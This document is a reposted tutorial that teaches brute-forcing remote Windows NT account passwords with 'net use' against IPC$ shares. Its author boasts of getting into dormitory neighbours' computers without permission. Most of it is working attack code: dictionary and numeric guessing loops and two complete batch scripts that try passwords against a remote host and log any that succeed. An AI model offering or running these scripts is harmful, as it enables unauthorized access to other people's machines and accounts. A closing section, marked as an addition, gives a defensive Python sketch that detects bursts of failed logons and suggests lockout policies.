Use DOS commands to crack a remote NT user password

Source: Internet
Author: User

If you know an NT account and password, you can use

net use \\host\ipc$ "password" /user:"user"

to establish a connection with a remote host. This is a method that every hacker, and every friend who wants to become or is trying to become a hacker, knows. I am not even a newbie; I only know this one method, and I used the one method I know to access other people's computers on the dormitory network, because their computer passwords were empty. After they discovered this, I had a chat with them, and then they added passwords. Now I'm done. I want to have a peek at their passwords. Other methods have to be worked out; maybe you would use other methods, such as searching for a system, to get management permissions, but I cannot, because, as I said before, I only know that one. Some people may say that software can be used to brute-force passwords. That may be good, but I don't have any advanced software and I don't have the talent to study complicated usage. However, I found some commands when I happened to look at the DOS help. It was really impossible:

1. Dictionary: for /f %i in (dictionary file) do net use \\host\ipc$ "%i" /user:"user"
2. Number: for /l %i in (start,step,end) do net use \\host\ipc$ "%i" /user:"user"

For more information, see the help for "for" in DOS. This let me connect to several machines, but a problem also arises: I still don't know the password once I am connected, so I have to try them all again next time.


I was disappointed. Then I accidentally discovered another good method. Maybe I am too stupid and you are smarter; maybe you have already discovered it. I will not talk nonsense: the full method is provided below. Please correct me:


Save the following file as pass.bat:

@echo off
rem Append a header with date and time to the result file.
echo ------------------------------------------------------------------- >> c:\pass.txt
echo ------------------------------------------------------------------- >> c:\pass.txt
date /t >> c:\pass.txt
time /t >> c:\pass.txt
echo cracking result: >> c:\pass.txt
rem A sixth argument of 1 selects number mode; otherwise dictionary mode is used.
if "%6"=="1" goto shit2
:shit1
start "cracking" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3
goto quit
:shit2
start "cracking" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5
:quit

Save the following file as test.bat:

rem Arguments: %1 = host, %2 = password to try, %3 = user name.
net use \\%1\ipc$ %2 /user:"%3"
goto answer%ERRORLEVEL%
rem %ERRORLEVEL% indicates the result returned by the previous command execution. If the net use operation succeeds, 0 is returned, and if the operation fails, 2 is returned.
:answer0
echo remote host: "%1" >> c:\pass.txt
echo User: "%3" >> c:\pass.txt
echo password: %2 >> c:\pass.txt
net use \\%1\ipc$ /delete
exit
:answer2

Store pass.bat and test.bat in system32. The usage is as follows:
1. For dictionary cracking: pass.bat <dictionary file path and name> <host> <user name>
2. For number cracking: pass.bat <start count> <step> <end count> <host> <user name> 1
After the password is cracked, it is stored in the c:\pass.txt file.
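
Seen from the target host, the loop above shows up as a run of failed network logons (Security event ID 4625, logon type 3) for one account from one source, possibly ending in a successful logon (4624). The following detection sketch is an added example, not part of the original article; the comma-separated export layout, the sample addresses and accounts, and the threshold and window values are all assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: timestamp, event ID, logon type, target account, source address.
SAMPLE_EVENTS = """\
2024-05-01T10:00:00,4625,3,alice,10.0.0.23
2024-05-01T10:00:01,4625,3,alice,10.0.0.23
2024-05-01T10:00:02,4625,3,alice,10.0.0.23
2024-05-01T10:00:03,4625,3,alice,10.0.0.23
2024-05-01T10:00:04,4625,3,alice,10.0.0.23
2024-05-01T10:00:05,4624,3,alice,10.0.0.23
2024-05-01T10:05:00,4625,3,bob,10.0.0.40
2024-05-01T11:30:00,4625,3,bob,10.0.0.40
2024-05-01T12:00:00,4624,3,bob,10.0.0.40
2024-05-01T12:10:00,4625,2,carol,127.0.0.1
"""

def parse(lines):
    """Yield (timestamp, event_id, logon_type, user, source) from the assumed export format."""
    for line in lines.strip().splitlines():
        ts, event_id, logon_type, user, src = line.split(",")
        yield datetime.fromisoformat(ts), int(event_id), int(logon_type), user, src

def detect_guessing(lines, threshold=5, window=timedelta(minutes=1)):
    """Return alerts for bursts of failed network logons per (source, account)."""
    recent = defaultdict(deque)   # (src, user) -> timestamps of recent failures
    alerts = []
    for ts, event_id, logon_type, user, src in parse(lines):
        if logon_type != 3:       # only network logons (SMB / net use)
            continue
        fails = recent[(src, user)]
        while fails and ts - fails[0] > window:
            fails.popleft()       # drop failures that fell out of the window
        if event_id == 4625:
            fails.append(ts)
            if len(fails) == threshold:
                alerts.append(("burst", src, user, ts.isoformat()))
        elif event_id == 4624 and len(fails) >= threshold:
            # A success right after a burst suggests the password was guessed.
            alerts.append(("success_after_burst", src, user, ts.isoformat()))
            fails.clear()
    return alerts

if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_EVENTS):
        print(alert)
```

An account lockout policy limits how many guesses such a loop gets, and the success-after-burst alert marks accounts whose passwords should be reset.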
